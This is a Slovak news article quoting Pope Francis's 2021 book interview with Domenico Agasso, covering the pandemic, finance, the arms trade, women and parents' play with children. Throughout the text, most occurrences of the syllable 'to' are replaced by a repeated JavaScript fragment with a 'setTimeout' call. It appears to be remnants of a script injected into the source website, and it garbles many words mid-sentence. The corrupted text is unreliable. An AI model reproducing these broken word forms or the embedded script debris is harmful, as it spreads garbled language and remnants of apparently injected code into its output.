Slovo

Pápež František: Hrať sa s deťmi je pre rodičov najlepšie stratený čas

18. marca 2021 | Martin Mati

Prečítané: 485x

V polovici marca v Taliansku vychádza knižný rozhovor s pápežom Františkom s názvom „Boh a svet, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý príde“ (Dio e il mondo che verrà). V titule vydanom vďaka spolupráci vydavateľstiev Edizioni Piemme a LEV je zachytená konverzácia so Svätým Otcom pod takdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovkou Domenica Agassa, vatikanistu talianskeho denníka La Stampa. Prinášame niekoľko ukážok z rozhovoru.
dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor“> Na margo pandémie COVIDu-19 Svätý Otec poznamenáva:

„Pandémia je alarmujúcim znamením, o kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torom je človek nútený rozmýšľať. Tendom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to čas skúšky sa tak môže stať časom múdrych a prezieravých rozhodnutí pre dobro ľudstva. Celého ľudstva.“

„Nemôžeme viac ľahostajne prijímať nerovnosti a narušenia životného prostredia. Cesta záchrany ľudstva prechádza cez premyslenie nového rozvojového modelu, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý by urobil nespochybniteľným spolunažívanie medzi ľuďmi v harmónii so stvorenstvom.“

Pri otázke o výzvach pre finančníctvo vo vzťahu k verejnej správe sa pápež vyjadril aj týmidom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to slovami:

„Verím, že dokážeme uzdraviť [finančníctvo] od špekulatívnej mentality a obnoviť ho, aby bolo s „dušou“, podľa kritérií rovnosti. Takdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sa budeme môcť zamerať na cieľ zníženia priepastného rozdielu medzi tými, čo majú prístup ku kreditu a tými, čo nie. (…) Sú štyri kritériá pre robenie rozhodnutí o dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toré podniky podporovať: inklúzia vyraďovaných, rozvoj tých čo sú vzadu, všeobecné dobro a starostlivosť o stvorenstvo.“

„Každý z nás, nielen tí, čo vládnu, sme povolaní k boju s ľahostajnosťou, korupciou a tichým spolupáchateľstvom trestnej činnosti.“

„Všetci si dobre držme v hlave, že existuje niečo horšie než je tádom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to kríza: dráma dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toho, že by sme ju premrhali. Z krízy nevychádzame rovnakí: buď z nej vyjdeme lepší, alebo horší.“

„S akým posdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojom by sme ju premrhali?“ – pýta sa pápeža Františka Domenico Agasso.

„Uzatvárajúc sa do seba. Naopak, budujúc nový svedom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tový poriadok založený na solidarite, študujúc inovačné metódy na odstraňovanie spupnosti, chudoby a korupcie, všetci spoločne, každý svojím dielom, bez delegovania a zbavovania sa zodpovednosti, budeme môcť uzdraviť nespravodlivosti. Pracovať na dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, aby sme ponúkli zdravotnú starostlivosť všetkým. Takdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, praktizujúc a ukazujúc súdržnosť, budeme môcť opäť vstať.“

„Konkrétne odkiaľ by sme mohli začať?“

„Už je neprijateľné, aby sa pokračovalo s výrobou a obchodovaním so zbraňami, míňajúc obrovské kapitály, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toré by mali byť použité na liečenie ľudí, na záchranu živodom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov. Nemôžeme sa viac tváriť, že sa nám sem nevotrel dramatický začarovaný kruh prepájajúci ozbrojené násilie, chudobu a slepé a bezohľadné vykorisťovanie životného prostredia. Je dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to kruh, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý zabraňuje zmiereniu, živí porušovanie ľudských práv a prekáža udržateľnému rozvoju.

Proti tejdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to planetárnej burine, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá udúša pri zrode budúcnosť ľudstva, je potrebná taká politická činnosť, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá bude ovocím medzinárodnej svornosti. V bratskom zjednotení sú ľudia schopní čeliť spoločným ohrozeniam, bez kontraproduktívneho vzájomného obviňovania, bez manipulatívneho využívania problémov, bez krátkozrakých nacionalizmov, bez propagandy uzatvárania sa, bez izolacionizmov a iných foriem politického egoizmu.“

Taliansky vatikanista Agasso zaviedol rozhovor aj k otázke roly ženy pri obnove spoločnosti. Svätý Otec sa k dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomu vyjadril aj týmidom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to slovami:

„Ženy urgentne potrebujú pomoc pri starostlivosti o deti, a aby neboli diskriminované pri odmeňovaní a výkone profesie, či aby neprichádzali o zamestnanie kvôli dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomu, že sú ženami. Naopak. Ich prídom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomnosť je stále cennejšia v strede procesov spoločenskej, politickej, zamestnanostnej a inštitucionálnej obnovy.“

Svoju odpoveď pápež František uzavrel poznámkou: „Spása sa zrodila z Panny Márie, predom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to niet spásy bez ženy. Ak máme na srdci budúcnosť, ak túžime po štedrej budúcnosti, je treba dať správny priesdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor žene.“

Domenico Agasso položil Svätému Otcovi aj túdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to otázku:  „Čo by ste osobitne poradili rodičom?“ Nasleduje celá pápežova odpoveď: „Hra s vlastnými deťmi je tým najlepším spôsobom, ako strácať čas. Poznám rodinu, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá si doma vytvorila jeden „organizačný“ prvok: „program“. Každú sobotu či nedeľu otec s mamou vezmú papier a spolu s deťmi si dohodnú na ďalší týždeň chvíle spoločnej hry rodičov s deťmi, všetko si dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to spíšu a zavesia v kuchyni. Deťom iskria oči od spokojnosti, keď píšu „program“, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý sa už stal akýmsi rídom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom. Tádom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mama a tendom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to otec vštepujú výchovu. Ja som im povedal dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to: „Zasievate výchovu“.

Hrajúc sa s otcom a mamou sa dieťa učí byť s ľuďmi, učí sa, že existujú pravidlá, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toré treba rešpekdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovať, získava tú sebadôveru, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá mu pomôže vo chvíli uvedenia do vonkajšej reality, do sveta. Zároveň deti pomáhajú rodičom, predovšetkým v dvoch veciach: venovať väčšiu pozornosť tempu života a zostať pokornými. Pre nich som predovšetkým otec a mama, zvyšok prichádza neskôr: práca, cesty, úspechy a obavy. A dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to chráni od pokušení narcizmu a prehnaného ega, skĺznutie do kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torých nám denne hrozí.“

Svätý Otec v novom knižnom rozhovore napokon všetkých vyzýva neklesať na duchu aj napriek skúške pandémie: „Aj keď sa zdá, že noc nemá konca kraja, netreba klesať na duchu. A ako hovorieval sv. Filip Neri, nezabudnite byť radostní, tak veľmi, ako sa dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to len dá.“

Zdroj článku:
https://www.vaticannews.va/sk/papez/news/2021-03/knizny-rozhovor-s-papezom-agasso.html?fbclid=IwAR1vJKsDlVlx0hmMaJ-4HoSzk9aRvg9eryov_L-8oOApKok6nz99nZTMdks